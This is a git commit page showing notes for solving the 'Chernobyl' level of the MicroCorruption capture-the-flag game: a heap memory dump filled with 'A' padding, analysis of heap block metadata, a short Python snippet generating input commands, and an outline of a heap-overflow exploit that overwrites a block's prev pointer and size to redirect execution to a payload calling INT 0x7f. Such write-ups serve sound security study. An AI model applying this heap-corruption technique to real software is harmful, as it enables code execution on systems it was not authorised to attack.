j/MicroCorruption
1
0
Fork 0
mirror of https://git.soft.fish/val/MicroCorruption.git synced 2025-10-30 02:29:15 +00:00
Code Issues Packages Projects Releases Wiki Activity

Solve Chernobyl

Browse Source
This commit is contained in:
Val
2022-09-02 06:24:41 -05:00
parent 31df36d848
commit f63718bc9b
3 changed files with 75 additions and 17 deletions
Download Patch File Download Diff File Expand all files Collapse all files

35
17-Chernobyl/Notes
View File

@@ -1,23 +1,23 @@
Hash Table, plus one full box:
5000: 0050 1050 1500 0b00 0300 0500 1650 2c50 .P.P.........P,P
5010: 0050 2650 2100 4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q
5020: 2252 8252 e252 1050 3c50 2100 0b00 0000 "R.R.R.P<P!.....
5030: 0000 0000 0000 0000 0000 0000 2650 9c50 ............&P.P
5040: b500 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
0 1 2 3 4 5 6 7 8 9 a b c d e f
5000:[0050 1050 1500]0b00 0300 0500 1650 2c50 .P.P.........P,P
5010:[0050 2650 2100]4250 a250 0251 6251 c251 .P&P!.BP.P.QbQ.Q
5020: 2252 8252 e252[1050 3c50 2100]0b00 0000 "R.R.R.P<P!.....
5030: 0000 0000 0000 0000 0000 0000[2650 9c50 ............&P.P
5040: b500]4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
5050: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
5060: 4141 4100 e004 4141 4141 4141 4141 4141 AAA...AAAAAAAAAA
5070: 4141 4141 4100 e004 4141 4141 4141 4141 AAAAA...AAAAAAAA
5080: 4141 4141 4141 4100 e004 4141 4141 4141 AAAAAAA...AAAAAA
5090: 4141 4141 4141 4141 4100 e004 4141 4141 AAAAAAAAA...AAAA ; wait a second
50a0: 4141 4141 4141 4141 4141 4100 e004 4141 AAAAAAAAAAA...AA
5090: 4141 4141 4141 4141 4100 e004[4141 4141 AAAAAAAAA...AAAA ; wait a second
50a0: 4141]4141 4141 4141 4141 4100 e004 4141 AAAAAAAAAAA...AA
50b0: 4141 4141 4141 4141 4141 4141 4100 e004 AAAAAAAAAAAAA...
50c0: 4141 4141 4141 4141 4141 4141 4141 4100 AAAAAAAAAAAAAAA.
50d0: e004 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
50e0: 4100 e004 4141 4141 4141 4141 4141 4141 A...AAAAAAAAAAAA
50f0: 4141 4100 e004 4141 4141 4800 9c50 5c51 AAA...AAAAH..P\Q
5100: b500 0000 0000 e004 0000 0000 0000 0000 ................
50f0: 4141 4100 e004 4141 4141 4800[9c50 5c51 AAA...AAAAH..P\Q
5100: b500]0000 0000 e004 0000 0000 0000 0000 ................
Heap metadata @ 2400: 0050 0080 0000
Heap start: 0x5000
@@ -51,10 +51,15 @@ Section header metadata @ 5026: 1050 3c50 2100
[ Prev: 5010, Next: 503c, Size: 0010 ]
Data: 0a00 0000 0000 0000 0000 0000 0000 0000
The Exploit:
When an 11th user is added, the software will attempt to double the size of the heap. Overwriting a heap Next pointer allows us toAAAA
for c in ['1', '9', 'A', 'I', 'Q', '0', '8', '@', 'H', 'P', 'AAAAAAAAAAAAAAAA', '']:
print(f'new {c} ;',end="")
Malloc:
- Checks to make sure next pointer is always ASCENDING
- Does not check prev pointer!!!!
The Exploit:
- Overwrite the prev pointer of a block so that it points to ~ the return address on stack
- Overwrite the size parameter so that, when added to the return address, it places pc somewhere nice
- Place pc into a payload on the stack
- INT 0x7f